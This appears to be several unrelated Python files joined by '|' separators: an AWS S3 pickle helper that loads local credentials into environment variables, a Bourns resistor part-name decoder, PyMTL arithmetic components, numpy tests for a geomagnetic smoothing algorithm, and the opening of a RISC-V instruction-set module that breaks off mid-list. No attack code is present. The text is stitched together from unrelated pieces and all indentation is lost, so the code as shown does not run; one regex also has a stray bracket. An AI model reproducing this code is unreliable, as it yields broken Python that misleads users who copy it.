##print(cred_info)
#S3 = boto.connect_s3(**cred_info)
S3 = boto.s3.connect_to_region('us-west-2')
TMPDIR='/data/tmp'
try:
if not os.path.isdir(TMPDIR):
os.mkdir(TMPDIR)
except OSError:
TMPDIR = os.getcwd()
#set up S3 environment variables
creds_path = os.path.join(os.path.expanduser('~'), '.aws/credentials')
if os.path.isfile(creds_path):
with open(creds_path) as creds_in:
creds_dict = dict([elt.strip().split(' = ') for elt in creds_in if ' = ' in elt])
os.environ['AWS_ACCESS_KEY_ID'] = creds_dict['aws_access_key_id']
os.environ['AWS_SECRET_ACCESS_KEY'] = creds_dict['aws_secret_access_key']
else:
sys.stderr.write('Warning: No AWS credentials found in /root/.aws directory.')
def parse_s3_url(s3_url):
'''Parse out and return the bucket name and key path of an s3 url.
'''
s3_url = s3_url.split('/')
bucket_txt = s3_url[2]
key_txt = '/'.join(s3_url[3:])
return bucket_txt, key_txt
def get_pickle_s3(bucketname, keyname):
'''Get a pickled file from AWS S3.
'''
key = S3.get_bucket(bucketname).get_key(keyname)
with NamedTemporaryFile(dir=TMPDIR) as tmp:
key.get_contents_to_file(tmp, headers={'x-amz-request-payer':'requester'})
tmp.seek(0)
pickled = pickle.load(tmp)
return pickled
def set_pickle_s3(bucketname, keyname, obj):
'''Pickle and write an object to AWS S3.
'''
try:
bucket = S3.get_bucket(bucketname)
except boto.exception.S3ResponseError:
bucket = S3.create_bucket(bucketname)
key = bucket.get_key(keyname)
if key is None:
key = bucket.new_key(keyname)
# key.set_contents_from_string(pickle.dumps(obj), headers={'x-amz-request-payer':'requester'})
with NamedTemporaryFile(dir=TMPDIR) as tmp:
pickle.dump(obj, tmp)
tmp.seek(0)
key.set_contents_from_file(tmp, headers={'x-amz-request-payer':'requester'})
def glob_keys(bucketname, glob_str, just_names=False):
'''Query keys for the specified bucket and return keys with
names matching the glob string.
'''
bucket = S3.get_bucket(bucketname)
path_levels = glob_str.split('/')
return glob_keys_helper(bucket.list(prefix=path_levels[0], delimiter='/'), path_levels, 0, just_names=just_names)
def glob_keys_helper(prefixes, glob_levels, level_idx, just_names=False):
globbed = []
for elt in prefixes:
if fnmatch.fnmatch(elt.name.rstrip('/'), '/'.join(glob_levels[:level_idx + 1]).rstrip('/')):
if level_idx + 1 == len(glob_levels):
if just_names is True:
key = elt.name
else:
key = elt.bucket.get_key(elt.name)
if key:
globbed.append(key)
else:
globbed.extend(glob_keys_helper(elt.bucket.list(prefix=elt.name, delimiter='/'),
glob_levels,
level_idx + 1, just_names=just_names))
return globbed
def glob_buckets(glob_str):
'''Find buckets with names matching the provided glob string.
'''
globbed = []
for bucket in S3.get_all_buckets():
if fnmatch.fnmatch(bucket.name, glob_str):
globbed.append(bucket)
return globbed
|
from .common import *
from partname_resolver.components.resistor import Resistor
from partname_resolver.units.resistanceTolerance import Tolerance
from ..units.temperature import TemperatureRange
import re
from decimal import Decimal
series = {'CAT16': 'Concave Terminations',
'CAY16': 'Convex Terminations',
'CHV': 'Thick Film High Voltage Chip Resistors',
'CR': 'Chip Resistor'}
tolerance = {'F': Tolerance('1%'),
'J': Tolerance('5%')}
tcr = {'X': '100ppm/K',
'W': '200ppm/K'}
packing = {'E': 'Unknown',
'G': 'Paper Tape (10,000 pcs.) on 7-inch Plastic Reel'}
termination = {'LF': 'Tin-plated (RoHS compliant)'}
size_CAT16 = {'J2': '0606',
'F4': '1206',
'J4': '1206',
'F8': '2406',
'J8': '2406'}
size_CAY16 = {'J2': '0606',
'F4': '1206',
'J4': '1206',
'F8': '2406',
'J8': '1506'}
size = {'CAT16': size_CAT16, 'CAY16': size_CAY16}
resistor_type = {'CAT16': Resistor.Type.ThickFilmResistorArray,
'CAY16': Resistor.Type.ThickFilmResistorArray,
'CHV': Resistor.Type.ThickFilmResistor,
'CR': Resistor.Type.ThickFilmResistor}
power = {'0201': Decimal('0.05'),
'0603': Decimal('0.1'),
'0805': Decimal('0.125'),
'1206': Decimal('0.25'),
'2010': Decimal('0.5'),
'2512': Decimal('1')}
maximum_working_voltage = {'0201': '25V',
'0603': '200V',
'0805': '400V',
'1206': '800V',
'2010': '2000V',
'2512': '3000V'}
working_temperature_range = {'CAT16': TemperatureRange(Decimal('-55'), Decimal('125')),
'CAY16': TemperatureRange(Decimal('-55'), Decimal('125')),
'CHV': TemperatureRange(Decimal('-55'), Decimal('155')),
'CR': TemperatureRange(Decimal('-55'), Decimal('125'))}
def build_regexpr_CHV():
series_group = '(CHV)' # 1
size_group = '(0201|0603|0805|1206|2010|2512)' # 2
separator = '(-)' # 3
tolerance_group = build_group(tolerance) # 4
tcr_group = build_group(tcr) # 5
separator2 = '(-)' # 6
resistance_group = '(\d{3,4}|\d{2}R|\d{1}R\d{1}])' # 7
packing_group = build_group(packing) # 8
termination_group = build_group(termination) # 9
return series_group + size_group + separator + tolerance_group + tcr_group + separator2 + resistance_group + \
packing_group + termination_group + '?'
def decode_match_CHV(match):
note = series[match.group(1)] + ", TCR=" + tcr[match.group(5)] + ", " + termination[match.group(9)] +\
", Packing: " + packing[match.group(8)]
return Resistor(resistor_type=resistor_type[match.group(1)],
manufacturer="Bourns",
partnumber=match.group(1) + match.group(2) + match.group(3) + match.group(4) + match.group(
5) + match.group(6) + match.group(7) + match.group(8) + match.group(9),
working_temperature_range=working_temperature_range[match.group(1)],
series=match.group(1),
resistance=resistance_string_to_ohm(match.group(7)),
power=power[match.group(2)],
max_working_voltage=maximum_working_voltage[match.group(2)],
tolerance=tolerance[match.group(4)],
case=match.group(2),
note=note)
def build_regexpr():
series_group = build_group(series) # 1
separator = '(-)' # 2
resistance_group = '(\d{3}|\d{2}R|\d{1}R\d{1}])' # 3
tolerance_group = build_group(tolerance) # 4
resistors_group = '(2|4|8)' # 5
termination_group = build_group(termination) # 6
return series_group + separator + resistance_group + tolerance_group + resistors_group + termination_group + '?'
def decode_match(match):
return Resistor(resistor_type=resistor_type[match.group(1)],
manufacturer="Bourns",
partnumber=match.group(1) + match.group(2) + match.group(3) + match.group(4) + match.group(
5) + match.group(6),
working_temperature_range=working_temperature_range[match.group(1)],
series=match.group(1),
resistance=resistance_string_to_ohm(match.group(3)),
power=Decimal('0.125') if match.group(4) + match.group(5) == "J2" else Decimal('0.25'),
max_working_voltage='25V' if match.group(1) + match.group(4) + match.group(
5) == "CAY16J8" else '50V',
tolerance=tolerance[match.group(4)],
case=size[match.group(1)][match.group(4) + match.group(5)],
note=series[match.group(1)])
def resolve(partname):
regexpr = build_regexpr()
match = re.match(regexpr, partname)
if match:
return decode_match(match)
regexpr = build_regexpr_CHV()
match = re.match(regexpr, partname)
if match:
return decode_match_CHV(match)
|
<gh_stars>100-1000
#=======================================================================
# arith.py
#=======================================================================
'''Collection of translatable arithmetic components.'''
from pymtl import *
#-----------------------------------------------------------------------
# Adder
#-----------------------------------------------------------------------
class Adder( Model ):
def __init__( s, nbits = 1 ):
s.in0 = InPort ( nbits )
s.in1 = InPort ( nbits )
s.cin = InPort ( 1 )
s.out = OutPort ( nbits )
s.cout = OutPort ( 1 )
# Wires
twidth = nbits + 1
s.temp = Wire( twidth )
# Connections
s.connect( s.out, s.temp[0:nbits] )
s.connect( s.cout, s.temp[nbits] )
@s.combinational
def comb_logic():
# Zero extend the inputs by one bit so we can generate an extra
# carry out bit
t0 = zext( s.in0, twidth )
t1 = zext( s.in1, twidth )
s.temp.value = t0 + t1 + s.cin
def line_trace( s ):
return "{} {} {} () {} {}" \
.format( s.in0, s.in1, s.cin, s.out, s.cout )
#-----------------------------------------------------------------------
# Subtractor
#-----------------------------------------------------------------------
class Subtractor( Model ):
def __init__( s, nbits = 1 ):
s.in0 = InPort ( nbits )
s.in1 = InPort ( nbits )
s.out = OutPort ( nbits )
@s.combinational
def comb_logic():
s.out.value = s.in0 - s.in1
def line_trace( s ):
return "{} {} () {}".format( s.in0, s.in1, s.out )
#-----------------------------------------------------------------------
# Incrementer
#-----------------------------------------------------------------------
class Incrementer( Model ):
def __init__( s, nbits = 1, increment_amount = 1 ):
s.in_ = InPort ( nbits )
s.out = OutPort ( nbits )
@s.combinational
def comb_logic():
s.out.value = s.in_ + increment_amount
def line_trace( s ):
return "{} () {}".format( s.in_, s.out )
#-----------------------------------------------------------------------
# ZeroExtender
#-----------------------------------------------------------------------
class ZeroExtender( Model ):
def __init__( s, in_nbits = 1, out_nbits = 1 ):
s.in_ = InPort ( in_nbits )
s.out = OutPort ( out_nbits )
@s.combinational
def comb_logic():
s.out.value = zext( s.in_, out_nbits )
def line_trace( s ):
return "{} () {}".format( s.in_, s.out )
#-----------------------------------------------------------------------
# SignExtender
#-----------------------------------------------------------------------
class SignExtender( Model ):
def __init__( s, in_nbits = 1, out_nbits = 1 ):
assert in_nbits <= out_nbits
s.in_ = InPort ( in_nbits )
s.out = OutPort ( out_nbits )
@s.combinational
def comb_logic():
s.out.value = sext( s.in_, out_nbits )
def line_trace( s ):
return "{} () {}".format( s.in_, s.out )
#-----------------------------------------------------------------------
# Zero Comparator
#-----------------------------------------------------------------------
class ZeroComparator( Model ):
def __init__( s, nbits = 1 ):
s.in_ = InPort ( nbits )
s.out = OutPort ( 1 )
@s.combinational
def comb_logic():
s.out.value = s.in_ == 0
def line_trace( s ):
return "{} () {}".format( s.in_, s.out )
#-----------------------------------------------------------------------
# Equal Comparator
#-----------------------------------------------------------------------
class EqComparator( Model ):
def __init__( s, nbits = 1 ):
s.in0 = InPort ( nbits )
s.in1 = InPort ( nbits )
s.out = OutPort ( 1 )
@s.combinational
def comb_logic():
s.out.value = s.in0 == s.in1
def line_trace( s ):
return "{} {} () {}".format( s.in0, s.in1, s.out )
#-----------------------------------------------------------------------
# Less-Than Comparator
#-----------------------------------------------------------------------
class LtComparator( Model ):
def __init__( s, nbits = 1 ):
s.in0 = InPort ( nbits )
s.in1 = InPort ( nbits )
s.out = OutPort ( 1 )
@s.combinational
def comb_logic():
s.out.value = s.in0 < s.in1
def line_trace( s ):
return "{} {} () {}".format( s.in0, s.in1, s.out )
#-----------------------------------------------------------------------
# Greater-Than Comparator
#-----------------------------------------------------------------------
class GtComparator( Model ):
def __init__( s, nbits = 1 ):
s.in0 = InPort ( nbits )
s.in1 = InPort ( nbits )
s.out = OutPort ( 1 )
@s.combinational
def comb_logic():
s.out.value = s.in0 > s.in1
def line_trace( s ):
return "{} {} () {}".format( s.in0, s.in1, s.out )
#-----------------------------------------------------------------------
# SignUnit
#-----------------------------------------------------------------------
class SignUnit( Model ):
def __init__( s, nbits = 1 ):
s.in_ = InPort ( nbits )
s.out = OutPort ( nbits )
@s.combinational
def comb_logic():
s.out.value = ~s.in_ + 1
def line_trace( s ):
return "{} () {}".format( s.in_, s.out )
#-----------------------------------------------------------------------
# UnsignUnit
#-----------------------------------------------------------------------
class UnsignUnit( Model ):
def __init__( s, nbits ):
s.in_ = InPort ( nbits )
s.out = OutPort ( nbits )
@s.combinational
def comb_logic():
if s.in_[nbits-1]:
s.out.value = ~s.in_ + 1
else:
s.out.value = s.in_
def line_trace( s ):
return "{} () {}".format( s.in_, s.out )
#-----------------------------------------------------------------------
# LeftLogicalShifter
#-----------------------------------------------------------------------
class LeftLogicalShifter( Model ):
def __init__( s, inout_nbits = 1, shamt_nbits = 1 ):
s.in_ = InPort ( inout_nbits )
s.shamt = InPort ( shamt_nbits )
s.out = OutPort ( inout_nbits )
@s.combinational
def comb_logic():
s.out.value = s.in_ << s.shamt
def line_trace( s ):
return "{} {} () {}".format( s.in_, s.shamt, s.out )
#-----------------------------------------------------------------------
# RightLogicalShifter
#-----------------------------------------------------------------------
class RightLogicalShifter( Model ):
def __init__( s, inout_nbits = 1, shamt_nbits = 1 ):
s.in_ = InPort ( inout_nbits )
s.shamt = InPort ( shamt_nbits )
s.out = OutPort ( inout_nbits )
@s.combinational
def comb_logic():
s.out.value = s.in_ >> s.shamt
def line_trace( s ):
return "{} {} () {}".format( s.in_, s.shamt, s.out )
|
from geomagio.algorithm import SqDistAlgorithm as sq
import numpy as np
from numpy.testing import (
assert_allclose,
assert_almost_equal,
assert_array_less,
assert_equal,
)
def test_sqdistalgorithm_additive1():
"""SqDistAlgorithm_test.test_sqdistalgorithm_additive1()
Uses a simple 12 point data series to compare additive inputs with
corresponding outputs.
"""
# configure to test zero-step predictions of 4 "season" cycles
m = 4
t = np.linspace(0, 2 * np.pi, m + 1)[:-1]
hstep = 0
# initial slope is 0; average age is infinite
b0 = 0
beta = 1 / np.inf
# initial trendline is 0; average age is 12 steps
l0 = 0
alpha = 1 / 12.0
# initial seasonal correction is sinusoid; average age is 12 steps
s0 = np.sin(t)[0:4]
gamma = 1 / 12.0 * m
# standard deviation of unit-amplitude sinusoid
sigma0 = [np.sqrt(0.5)]
# predict three cycles ahead given l0 and s0, no inputs,
# and assume PI only grows with trendline adjustments
yobs1 = np.zeros(12) * np.nan
yhat1, shat1, sighat1, _, _, _, _, _ = sq.additive(
yobs1,
m,
alpha=alpha,
beta=beta,
gamma=0,
s0=s0,
l0=l0,
b0=b0,
sigma0=sigma0,
hstep=hstep,
)
assert_almost_equal(
yhat1,
[0, 1, 0, -1, 0, 1, 0, -1, 0, 1, 0, -1],
err_msg="yhat1 should almost equal simple time series",
)
assert_almost_equal(
shat1,
[0, 1, 0, -1, 0, 1, 0, -1, 0, 1, 0, -1],
err_msg="shat1 should almost equal simple time series",
)
assert_almost_equal(
sighat1,
[
0.70710678,
0.70955777,
0.71200031,
0.71443451,
0.71686044,
0.71927819,
0.72168784,
0.72408947,
0.72648316,
0.72886899,
0.73124703,
0.73361737,
],
err_msg="sighat1 should almost equal simple time series",
)
# predict three cycles ahead given l0 and s0, no inputs,
# and assume PI only grows with seasonal adjustments
yobs1 = np.zeros(12) * np.nan
yhat1, shat1, sighat1, _, _, _, _, _ = sq.additive(
yobs1,
m,
alpha=0,
beta=0,
gamma=gamma,
s0=s0,
l0=0,
b0=0,
sigma0=sigma0,
hstep=hstep,
)
assert_almost_equal(
yhat1,
[0, 1, 0, -1, 0, 1, 0, -1, 0, 1, 0, -1],
err_msg="yhat1 should almost equal simple time series, 2nd run",
)
assert_almost_equal(
shat1,
[0, 1, 0, -1, 0, 1, 0, -1, 0, 1, 0, -1],
err_msg="shat1 should almost equal simple time series, 2nd run",
)
assert_almost_equal(
sighat1,
[
0.70710678,
0.70710678,
0.70710678,
0.70710678,
0.74535599,
0.74535599,
0.74535599,
0.74535599,
0.78173596,
0.78173596,
0.78173596,
0.78173596,
],
err_msg="sighat1 should almost equal simple time series, 2nd run",
)
# smooth three cycles' worth of zero-value input observations,
# assuming only the trendline varies
yobs1 = np.zeros(12)
yhat1, shat1, sighat1, _, _, _, _, _ = sq.additive(
yobs1,
m,
alpha=alpha,
beta=0,
gamma=0,
s0=s0,
l0=0,
b0=0,
sigma0=sigma0,
hstep=hstep,
)
# check output
assert_almost_equal(
yhat1,
[
0,
1,
-0.08333333,
-1.07638889,
0.01331019,
1.01220100,
-0.07214908,
-1.06613666,
0.02270806,
1.02081573,
-0.06425225,
-1.0588979,
],
8,
err_msg="yhat1 should almost equal simple time series, 3rd run",
)
assert_almost_equal(
shat1,
[0, 1, 0, -1, 0, 1, 0, -1, 0, 1, 0, -1],
8,
err_msg="shat1 should almost equal simple time series, 3rd run",
)
assert_almost_equal(
sighat1,
[
0.64818122,
0.67749945,
0.62798561,
0.66535255,
0.61101568,
0.64444779,
0.59675623,
0.63587127,
0.58477433,
0.62111112,
0.57470621,
0.61505552,
],
8,
err_msg="sighat1 should almost equal simple time series, 3rd run",
)
# smooth three cycles' worth of zero-value input observations,
# assuming only the seasonal adjustments vary
yobs1 = np.zeros(12)
yhat1, shat1, sighat1, _, _, _, _, _ = sq.additive(
yobs1,
m,
alpha=0,
beta=0,
gamma=gamma,
s0=s0,
l0=0,
b0=0,
sigma0=sigma0,
hstep=hstep,
)
# check output
assert_almost_equal(
yhat1,
[0, 1, 0, -1, 0, 0.66666667, 0, -0.66666667, 0, 0.44444444, 0, -0.44444444],
8,
err_msg="yhat1 should almost equal simple time series, 4th run",
)
assert_almost_equal(
shat1,
[
0,
1,
0.08333333,
-0.91666667,
0,
0.66666667,
0.05555556,
-0.61111111,
0,
0.44444444,
0.03703704,
-0.40740741,
],
8,
err_msg="shat1 should almost equal simple time series, 4th run",
)
assert_almost_equal(
sighat1,
[
0.70710678,
0.70710678,
0.70710678,
0.70710678,
0.70710678,
0.70710678,
0.70710678,
0.70710678,
0.70710678,
0.70710678,
0.70710678,
0.70710678,
],
8,
err_msg="sighat1 should almost equal simple time series, 4th run",
)
# smooth three cycles' worth of sinusoid input observations,
# assuming only the seasonal adjustments vary, starting at zero
yobs1 = np.concatenate((s0, s0, s0))
yhat1, shat1, sighat1, _, _, _, _, _ = sq.additive(
yobs1,
m,
alpha=0,
beta=0,
gamma=gamma,
s0=s0 * 0,
l0=0,
b0=0,
sigma0=sigma0,
hstep=hstep,
)
# check output
assert_almost_equal(
yhat1,
[0, 0, 0, 0, 0, 0.33333333, 0, -0.33333333, 0, 0.55555556, 0, -0.55555556],
8,
err_msg="yhat1 should almost equal simple time series, 5th run",
)
assert_almost_equal(
shat1,
[
0,
0,
-0.08333333,
-0.08333333,
0,
0.33333333,
-0.05555556,
-0.38888889,
0,
0.55555555,
-0.03703704,
-0.59259259,
],
8,
err_msg="shat1 should almost equal simple time series, 5th run",
)
assert_almost_equal(
sighat1,
[
0.70710678,
0.70710678,
0.70710678,
0.70710678,
0.70710678,
0.70710678,
0.70710678,
0.70710678,
0.70710678,
0.70710678,
0.70710678,
0.70710678,
],
8,
err_msg="sighat1 should almost equal simple time series, 5th run",
)
def test_sqdistalgorithm_additive2():
"""SqDistAlgorithm_test.test_sqdistalgorithm_additive2()
Uses synthetic data time series over 300 days to test additive method
outputs.
"""
# set up smoothing parameters
m = 100 # length of "day"
alpha = 1.0 / 100.0 / 3.0 # average age of level is 3 "days"
beta = 0 # slope doesn't change
gamma = 1.0 / 100.0 * 100.0 / 3.0 # average age of "seasonal" correction
phi = 1 # don't dampen the slope
# initialize states for smoother
l0 = None # this uses the default initial level
b0 = 0 # this is NOT the default initial slope
s0 = None # this uses default initial "seasonal" correction
sigma0 = [0] # this is NOT the default initial standard deviation
# create first 50 "days" at 100 samples per synthetic "day", 0-50
t000to050 = np.arange(5001)
syn000to050 = 10.0 * np.sin(t000to050 * (2 * np.pi) / 100.0)
# these are the old "defaults" computed when l0, b0, and s0 were None
l0 = np.nanmean(syn000to050[0:1440])
b0 = (np.nanmean(syn000to050[m : 2 * m]) - np.nanmean(syn000to050[0:m])) / m
s0 = [syn000to050[i] - l0 for i in range(m)]
# run additive method on first 50 "days"
(
synHat000to050,
sHat000to050,
sigma000to050,
syn050,
s050,
l050,
b050,
sigma050,
) = sq.additive(
syn000to050,
m,
alpha,
beta,
gamma,
phi,
yhat0=None,
s0=s0,
l0=l0,
b0=b0,
sigma0=sigma0,
)
# The output should track the input exactly on this simple series
assert_equal(
synHat000to050.all(),
syn000to050.all(),
"Output of additive should match simple sinusoid exactly",
)
# Check max, min and average
assert_almost_equal(
np.amax(synHat000to050), 10, 8, "Additive output should have a max of 10.0"
)
assert_almost_equal(
np.amin(synHat000to050), -10, 8, "Additive output should have a min of -10.0"
)
assert_almost_equal(
np.mean(synHat000to050), 0, 8, "Additive output should have average of 0"
)
# create 2nd set of 50 "days", 50-100
t050to100 = np.arange(5001, 10001)
syn050to100 = 20 + 10.0 * np.sin(t050to100 * (2 * np.pi) / 100.0)
# run additive method on next 50 "days"
(
synHat050to100,
sHat050to100,
sigma050to100,
syn100,
s100,
l100,
b100,
sigma100,
) = sq.additive(
syn050to100,
m,
alpha,
beta,
gamma,
phi,
yhat0=syn050,
s0=s050,
l0=l050,
b0=b050,
sigma0=sigma050,
)
# Check max, min and average
assert_almost_equal(
np.amax(synHat050to100), 30, 6, "Additive output should have a max of 30.0"
)
assert_almost_equal(
np.amin(synHat050to100),
-8.81753802428088,
8,
"Additive output should have a min of -8.81753...",
)
assert_almost_equal(
np.mean(synHat050to100),
19.17899833054862,
8,
"Additive output should have average of 19.17899...",
)
# the initial part of the computed series is catching up to the synthetic
assert_array_less(
synHat050to100[:555],
syn050to100[:555],
"Output of additive should begin below synthetic data",
)
# short section where the series' swap places
assert_array_less(syn050to100[555:576], synHat050to100[555:576])
# they swap back
assert_array_less(synHat050to100[576:655], syn050to100[576:655])
# swap again
assert_array_less(syn050to100[655:689], synHat050to100[655:689])
# after the initial lag and swaps, the series' get closer and closer
assert_allclose(
syn050to100[475:],
synHat050to100[475:],
rtol=1e-1,
err_msg="Additive output should trend toward synthetic data, 1e-1",
)
assert_allclose(
syn050to100[955:],
synHat050to100[955:],
rtol=1e-2,
err_msg="Additive output should trend toward synthetic data, 1e-2",
)
assert_allclose(
syn050to100[1500:],
synHat050to100[1500:],
rtol=1e-3,
err_msg="Additive output should trend toward synthetic data, 1e-3",
)
assert_allclose(
syn050to100[2100:],
synHat050to100[2100:],
rtol=1e-4,
err_msg="Additive output should trend toward synthetic data, 1e-4",
)
assert_allclose(
syn050to100[2700:],
synHat050to100[2700:],
rtol=1e-5,
err_msg="Additive output should trend toward synthetic data, 1e-5",
)
assert_allclose(
syn050to100[3300:],
synHat050to100[3300:],
rtol=1e-6,
err_msg="Additive output should track synthetic data, 1e-6: 50-100",
)
# create 3rd set of 50 "days", 100-150
t100to150 = np.arange(10001, 15001)
syn100to150 = (
20
+ 10.0 * np.sin(t100to150 * (2 * np.pi) / 100.0)
+ 20 * np.sin(t100to150 * (2 * np.pi) / 5000.0)
)
# run the additive method on the 3rd set of 50 "days"
(
synHat100to150,
sHat100to150,
sigma100to150,
syn150,
s150,
l150,
b150,
sigma150,
) = sq.additive(
syn100to150,
m,
alpha,
beta,
gamma,
phi,
yhat0=syn100,
l0=l100,
b0=b100,
s0=s100,
sigma0=sigma100,
)
# Check max, min and average
assert_almost_equal(
np.amax(synHat100to150),
49.758884882080558,
8,
"Additive output should have a max of 49.75888...",
)
assert_almost_equal(
np.amin(synHat100to150),
-9.7579516919427647,
8,
"Additive output should have a min of -9.7579...",
)
assert_almost_equal(
np.mean(synHat100to150),
20.059589538984323,
8,
"Additive output should have average of 20.0595...",
)
# A couple of sections run pretty close together here
assert_allclose(
syn100to150[800:1900],
synHat100to150[800:1900],
rtol=1e-1,
err_msg="Additive output should track synthetic data: day 100-150",
)
# create 4th set of 50 "days", 150-200
t150to200 = np.arange(15001, 20001)
syn150to200 = 20 + (10.0 * np.sin(t150to200 * (2 * np.pi) / 100.0)) * (
1 * np.cos(t150to200 * (2 * np.pi) / 5000.0)
)
# run the additive method on the 4th set of 50 "days"
(
synHat150to200,
sHat150to200,
sigma150to200,
syn200,
s200,
l200,
b200,
sigma200,
) = sq.additive(
syn150to200,
m,
alpha,
beta,
gamma,
phi,
yhat0=syn150,
l0=l150,
b0=b150,
s0=s150,
sigma0=sigma150,
)
# Check max, min and average
assert_almost_equal(
np.amax(synHat150to200),
29.573654766341747,
8,
"Additive output should have a max of 29.5736...",
)
assert_almost_equal(
np.amin(synHat150to200),
7.9430807703401669,
8,
"Additive output should have a min of 7.943...",
)
assert_almost_equal(
np.mean(synHat150to200),
19.911560325896119,
8,
"Additive output should have average of 19.911...",
)
# create 5th set of 50 "days", 200-250
t200to250 = np.arange(20001, 25001)
syn200to250 = 20 + (
(10.0 * np.sin(t200to250 * (2 * np.pi) / 100.0))
* (1 * np.cos(t200to250 * (2 * np.pi) / 5000.0))
+ 20 * np.sin(t200to250 * (2 * np.pi) / 5000.0)
)
# run the additive method on the 5th set of 50 "days"
(
synHat200to250,
sHat200to250,
sigma200to250,
syn250,
s250,
l250,
b250,
sigma250,
) = sq.additive(
syn200to250,
m,
alpha,
beta,
gamma,
phi,
yhat0=syn200,
l0=l200,
b0=b200,
s0=s200,
sigma0=sigma200,
)
# Check max, min and average
assert_almost_equal(
np.amax(synHat200to250),
43.417782188651529,
8,
"Additive output should have a max of 43.417...",
)
assert_almost_equal(
np.amin(synHat200to250),
-3.4170071669726791,
8,
"Additive output should have a min of -3.417...",
)
assert_almost_equal(
np.mean(synHat200to250),
20.09191068952186,
8,
"Additive output should have average of 20.0919...",
)
# create 5th set of 50 "days", 250-300
t250to300 = np.arange(25001, 30001)
np.random.seed(123456789)
syn250to300 = (
20
+ (
(10.0 * np.sin(t250to300 * (2 * np.pi) / 100.0))
* (1 * np.cos(t250to300 * (2 * np.pi) / 5000.0))
+ 20 * np.sin(t250to300 * (2 * np.pi) / 5000.0)
)
+ 5 * np.random.randn(5000)
)
# run the additive method on the 5th set of 50 "days"
(
synHat250to300,
sHat250to300,
sigma250to300,
syn300,
s300,
l300,
b300,
sigma300,
) = sq.additive(
syn250to300,
m,
alpha,
beta,
gamma,
phi,
yhat0=syn250,
l0=l250,
b0=b250,
s0=s250,
sigma0=sigma250,
)
# Check max, min and average
assert_almost_equal(
np.amax(synHat250to300),
49.3099797861343534,
8,
"Additive output should have a max of 49.309...",
)
assert_almost_equal(
np.amin(synHat250to300),
-8.7531069723345301,
8,
"Additive output should have a min of -8.783...",
)
assert_almost_equal(
np.mean(synHat250to300),
20.006498585824623,
8,
"Additive output should have average of 20.006...",
)
|
#=======================================================================
# isa.py
#=======================================================================
# Check if importing softfloat will succeed. If it's not built, then
# softfloat._abi will not exist and throw and ImportError
try:
import softfloat
ENABLE_FP = True
except ImportError:
print ( "WARNING: softfloat could not be imported because it was not "
"built. Floating point will be disabled. Build softfloat using "
"build-softfloat.py script under scripts/ to enable floating "
"point support." )
ENABLE_FP = False
except AttributeError:
print ( "WARNING: the CFFI installation doesn't support "
"_cffi_backend.FFI() call. Floating point will be disabled. "
"Upgrade CFFI to enable floating point support." )
ENABLE_FP = False
from utils import sext_32, signed, sext, trim
from pydgin.misc import create_risc_decoder, FatalError, \
NotImplementedInstError
from pydgin.utils import (
trim_32, specialize, intmask, bits2float, float2bits
)
from helpers import *
from csr import PRV_U, PRV_S, PRV_H, PRV_M
import isa_RV32I, isa_RV64I, isa_RV32M, isa_RV64M, isa_RV32A, isa_RV64A
# TODO: super hacky! fixme to only import encoding_* funcs!
from isa_RV32I import *
from isa_RV64I import *
from isa_RV32M import *
from isa_RV64M import *
from isa_RV32A import *
from isa_RV64A import *
if ENABLE_FP:
import isa_RV32F, isa_RV64F, isa_RV32D, isa_RV64D
from isa_RV32F import *
from isa_RV64F import *
from isa_RV32D import *
from isa_RV64D import *
#=======================================================================
# Register Definitions
#=======================================================================
reg_map = {
'$0' : 0, '$1' : 1, '$2' : 2, '$3' : 3,
'$4' : 4, '$5' : 5, '$6' : 6, '$7' : 7,
'$8' : 8, '$9' : 9, '$10' : 10, '$11' : 11,
'$12' : 12, '$13' : 13, '$14' : 14, '$15' : 15,
'$16' : 16, '$17' : 17, '$18' : 18, '$19' : 19,
'$20' : 20, '$21' : 21, '$22' : 22, '$23' : 23,
'$24' : 24, '$25' : 25, '$26' : 26, '$27' : 27,
'$28' : 28, '$29' : 29, '$30' : 30, '$31' : 31,
'x0' : 0, 'x1' : 1, 'x2' : 2, 'x3' : 3,
'x4' : 4, 'x5' : 5, 'x6' : 6, 'x7' : 7,
'x8' : 8, 'x9' : 9, 'x10' : 10, 'x11' : 11,
'x12' : 12, 'x13' : 13, 'x14' : 14, 'x15' : 15,
'x16' : 16, 'x17' : 17, 'x18' : 18, 'x19' : 19,
'x20' : 20, 'x21' : 21, 'x22' : 22, 'x23' : 23,
'x24' : 24, 'x25' : 25, 'x26' : 26, 'x27' : 27,
'x28' : 28, 'x29' : 29, 'x30' : 30, 'x31' : 31,
# abi as of jan 2015:
# https://blog.riscv.org/wp-content/uploads/2015/01/riscv-calling.pdf
'zero' : 0, 'ra' : 1, 'sp' : 2, 'gp' : 3,
'tp' : 4, 't0' : 5, 't1' : 6, 't2' : 7,
's0' : 8, 's1' : 9, 'a0' : 10, 'a1' : 11,
'a2' : 12, 'a3' : 13, 'a4' : 14, 'a5' : 15,
'a6' : 16, 'a7' : 17, 's2' : 18, 's3' : 19,
's4' : 20, 's5' : 21, 's6' : 22, 's7' : 23,
's8' : 24, 's9' : 25, 's10' : 26, 's11' : 27,
't3' : 28, 't4' : 29, 't5' : 30, 't6' : 31,
'fp' : 8,
# floating point
'f0' : 0, 'f1' : 1, 'f2' : 2, 'f3' : 3,
'f4' : 4, 'f5' : 5, 'f6' : 6, 'f7' : 7,
'f8' : 8, 'f9' : 9, 'f10' : 10, 'f11' : 11,
'f12' : 12, 'f13' : 13, 'f14' : 14, 'f15' : 15,
'f16' : 16, 'f17' : 17, 'f18' : 18, 'f19' : 19,
'f20' : 20, 'f21' : 21, 'f22' : 22, 'f23' : 23,
'f24' : 24, 'f25' : 25, 'f26' : 26, 'f27' : 27,
'f28' : 28, 'f29' : 29, 'f30' : 30, 'f31' : 31,
# abi as of jan 2015:
# https://blog.riscv.org/wp-content/uploads/2015/01/riscv-calling.pdf
'ft0' : 0, 'ft1' : 1, 'ft2' : 2, 'ft3' : 3,
'ft4' : 4, 'ft5' : 5, 'ft6' : 6, 'ft7' : 7,
'fs0' : 8, 'fs1' : 9, 'fa0' : 10, 'fa1' : 11,
'fa2' : 12, 'fa3' : 13, 'fa4' : 14, 'fa5' : 15,
'fa6' : 16, 'fa7' : 17, 'fs2' : 18, 'fs3' : 19,
'fs4' : 20, 'fs5' : 21, 'fs6' : 22, 'fs7' : 23,
'fs8' : 24, 'fs9' : 25, 'fs10' : 26, 'fs11' : 27,
'ft8' : 28, 'ft9' : 29, 'ft10' : 30, 'ft11' : 31,
}
#=======================================================================
# Instruction Encodings
#=======================================================================
other_encodings = [
['sret', '00010000000000000000000001110011'],
['sfence_vm', '000100000001xxxxx000000001110011'],
['wfi', '00010000001000000000000001110011'],
